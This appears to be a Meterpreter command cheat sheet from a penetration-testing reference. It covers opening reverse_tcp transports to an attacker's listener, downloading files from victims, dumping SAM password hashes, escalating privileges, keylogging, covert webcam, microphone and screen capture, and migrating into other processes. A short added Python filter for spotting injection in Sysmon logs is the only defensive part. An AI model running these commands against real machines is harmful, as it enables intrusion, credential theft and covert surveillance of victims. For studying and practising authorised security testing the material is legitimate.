Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
See OffSec’s Meterpreter basic commands.
Meterpreter Sessions
Display opened sessions
sessions -l -v
Go to session #1
sessions -i 1
Upgrade session #1
sessions -u 1
Obtain system information and user
sysinfo
getuid
Obtain system information and escalate privileges
sysinfo
getsystem
Go back to the handler
background
List transports
Transports allow switching protocols after a session is created. See Meterpreter Transport Control.
transport list
Add a transport
After adding the transport, background the session and start a listener using the Multi Handler.
transport add -t <transport name> -l $KALI_IP -p $LISTENER_PORT
Like the windows/meterpreter/reverse_tcp payload:
transport add -t reverse_tcp -l $KALI_IP -p $LISTENER_PORT
Switch to next transport
transport next
sessions
sessions -i 2
Download a file from the victim machine
download <source> <destination>
download c://secret.txt /root/Documents/
download "c:\windows\system32\calc.exe" /tmp/calc.exe
Upload a file to the victim machine
upload <source> <destination>
upload localfilepath/file.txt /remotefilepath/file.txt
upload /usr/share/windows-resources/binaries/plink.exe c:\\somepath
Other commands
# Get all available commands
help
# Dump the contents of the SAM database (all computer passwords)
hashdump
# Get a shell
shell
python -c 'import pty; pty.spawn("/bin/bash")'
# Upload a file to the victim computer
# Start a keylogger
keyscan_start
# See keylogger results
keyscan_dump
Privilege Escalation
Elevate privileges to system
getsystem
Gather information for privilege escalation
use post/windows/gather/win_privs
set session <session ID>
run
Post-Exploitation within Meterpreter
help
Some actions are sensitive to context.
Dump contents of the SAM database
hashdump
Take a screenshot of the victim machine
This may fail with: Error: Current session was spawned by a service on Windows 8+. No desktops are available to screenshot.
screenshot
See the victim machine’s screen in real time
screenshare
Webcam
Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam
Keylogger
keyscan_start
keyscan_dump
keyscan_stop
Migrating to another process
Meterpreter payloads execute within the process of the exploited application. When that application is closed, the session dies. Migrate to another process after the Meterpreter session is created to avoid losing the session.
List current processes
ps
Migrate the Meterpreter session to another process
The target process must run at the same privilege and integrity level as the current session, or lower.
migrate <PID>
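Migration works by injecting the payload into another process, so remote thread creation is one place defenders look for it. The following is an added example, not part of the original page: a Python filter over constructed Sysmon Event ID 8 (CreateRemoteThread) records. The allowlist, file paths, PIDs and timestamps are assumptions made for illustration.

```python
# Added example (not from the original page): flag Sysmon Event ID 8
# (CreateRemoteThread) records that look like cross-process code injection.
# All events, paths and PIDs below are constructed sample data.

# Assumption: sources allowed to create remote threads in this environment.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2024-01-01 10:00:01.000",
     "Image": r"C:\Users\Public\update.exe", "ProcessId": 4120},
    {"EventID": 8, "UtcTime": "2024-01-01 10:00:07.000",
     "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 612,
     "TargetImage": r"C:\Windows\System32\conhost.exe", "TargetProcessId": 3344,
     "StartModule": "-"},
    {"EventID": 8, "UtcTime": "2024-01-01 10:02:13.000",
     "SourceImage": r"C:\Tools\debugger.exe", "SourceProcessId": 5100,
     "TargetImage": r"C:\Apps\service.exe", "TargetProcessId": 5204,
     "StartModule": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 8, "UtcTime": "2024-01-01 10:05:42.000",
     "SourceImage": r"C:\Users\Public\update.exe", "SourceProcessId": 4120,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 2308,
     "StartModule": "-"},
]


def is_suspicious(event, allowed=ALLOWED_SOURCES):
    """True when a remote thread starts in memory not backed by a module."""
    if event.get("EventID") != 8:
        return False
    source = event.get("SourceImage", "").lower()
    target = event.get("TargetImage", "").lower()
    if source in allowed or source == target:
        return False
    # Sysmon logs "-" when the start address maps to no loaded DLL or EXE,
    # which is what a thread running injected code looks like.
    return event.get("StartModule", "-").strip() in ("", "-")


def find_injections(events):
    """Return (time, source image, source PID, target image, target PID)."""
    return [(e["UtcTime"], e["SourceImage"], e["SourceProcessId"],
             e["TargetImage"], e["TargetProcessId"])
            for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_EVENTS):
        print("possible injection:", hit)
```

The unbacked start address is a heuristic: tune the allowlist for software in your environment that legitimately creates remote threads.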
Port Forwarding
portfwd -h